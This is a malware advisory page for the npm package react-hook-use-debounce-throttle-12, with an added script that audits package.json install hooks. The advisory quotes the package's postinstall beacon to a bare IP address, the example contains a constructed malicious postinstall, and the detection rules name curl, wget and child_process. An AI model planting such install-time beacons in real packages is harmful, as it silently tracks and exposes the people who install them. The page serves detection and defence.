npm

react-hook-use-debounce-throttle-12 @1.0.2

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5909

Ecosystem

npm

Summary

package.json declares a postinstall hook that runs node -e to issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently swallowed: require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end(). The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no TLS, no publisher correlation, and no documented purpose; the request fires unconditionally on every npm install, leaking the installer's IP, install timing, and machine footprint to the operator of that host. Author metadata is a generic placeholder (dev-utils <dev@utils-lib.dev>) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, mismatched purpose, silent error handling, and placeholder publisher identity is a victim-enumeration/install-tracking attack.

Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af)
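The summary above describes the indicators that make this package's postinstall hook suspicious: inline node -e execution, a Node network module loaded at install time, a bare IPv4 destination, and an error handler that discards failures. The following script is an added example written for this page, not code from OSV, Amazon Inspector or the package itself. It audits the lifecycle scripts in a package.json object for exactly those indicators and returns a block/review/clean verdict. The sample package.json and the 192.0.2.10 address (an RFC 5737 documentation address) are constructed for the example and are not the values from the report.

```javascript
// Added example (not part of the OSV record): audit an npm package.json for
// install-time lifecycle scripts that show the indicators described above.
// Input is a parsed package.json object; output is a list of findings.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Each rule is one indicator a defender would want surfaced from an install hook.
const INDICATORS = [
  { id: 'inline-node', re: /\bnode\s+(-e|--eval)\b/,
    why: 'inline JavaScript executed at install time' },
  { id: 'node-network-module', re: /require\(\s*['"](https?|net|dgram|tls)['"]\s*\)/,
    why: 'Node network module loaded in an install hook' },
  { id: 'shell-downloader', re: /\b(curl|wget|Invoke-WebRequest)\b/,
    why: 'command-line HTTP client invoked in an install hook' },
  { id: 'bare-ipv4', re: /\b(?:\d{1,3}\.){3}\d{1,3}\b/,
    why: 'connection to a bare IPv4 address instead of a named host' },
  { id: 'swallowed-errors', re: /\.on\(\s*['"]error['"]\s*,\s*function\s*\(\s*\)\s*\{\s*\}\s*\)/,
    why: 'network errors silently discarded' },
  { id: 'child-process', re: /require\(\s*['"]child_process['"]\s*\)/,
    why: 'subprocess spawned at install time' },
];

// Walk every install-time hook and record each indicator that matches it.
function auditInstallScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(cmd)) findings.push({ hook, indicator: ind.id, reason: ind.why });
    }
  }
  return findings;
}

// Policy: any network-reaching indicator in an install hook blocks the install;
// other indicators (inline node, child_process) are flagged for human review.
function verdict(findings) {
  const network = new Set(['node-network-module', 'shell-downloader', 'bare-ipv4']);
  if (findings.some((f) => network.has(f.indicator))) return 'block';
  if (findings.length > 0) return 'review';
  return 'clean';
}

// Convenience wrapper for a package.json on disk (CommonJS; not used by the sample run).
function auditPackageJsonFile(path) {
  const fs = require('fs');
  return auditInstallScripts(JSON.parse(fs.readFileSync(path, 'utf8')));
}

// Constructed sample modelled on the pattern the advisory describes. The address
// 192.0.2.10 is an RFC 5737 documentation address, not the one from the report.
const SAMPLE_MALICIOUS = {
  name: 'example-hooks-lib',
  version: '1.0.0',
  scripts: {
    postinstall: `node -e "require('https').request({hostname:'192.0.2.10',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end()"`,
  },
};

// Constructed benign package: only build/test scripts, no install hooks.
const SAMPLE_BENIGN = {
  name: 'example-clean',
  version: '1.0.0',
  scripts: { build: 'tsc -p .', test: 'jest' },
};

for (const pkg of [SAMPLE_MALICIOUS, SAMPLE_BENIGN]) {
  const findings = auditInstallScripts(pkg);
  console.log(pkg.name, '->', verdict(findings));
  for (const f of findings) console.log('  [' + f.hook + '] ' + f.indicator + ': ' + f.reason);
}
```

Run it with node against a package.json via auditPackageJsonFile('./node_modules/<pkg>/package.json') in a pre-install gate, or over every entry in a lock file before scripts are allowed to run. Setting ignore-scripts in npm configuration (npm config set ignore-scripts true, or npm install --ignore-scripts) prevents hooks like the one in this report from executing at all, at the cost of breaking packages that legitimately build native code at install time; the audit above is the check that decides which packages to allow through when that setting is on.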
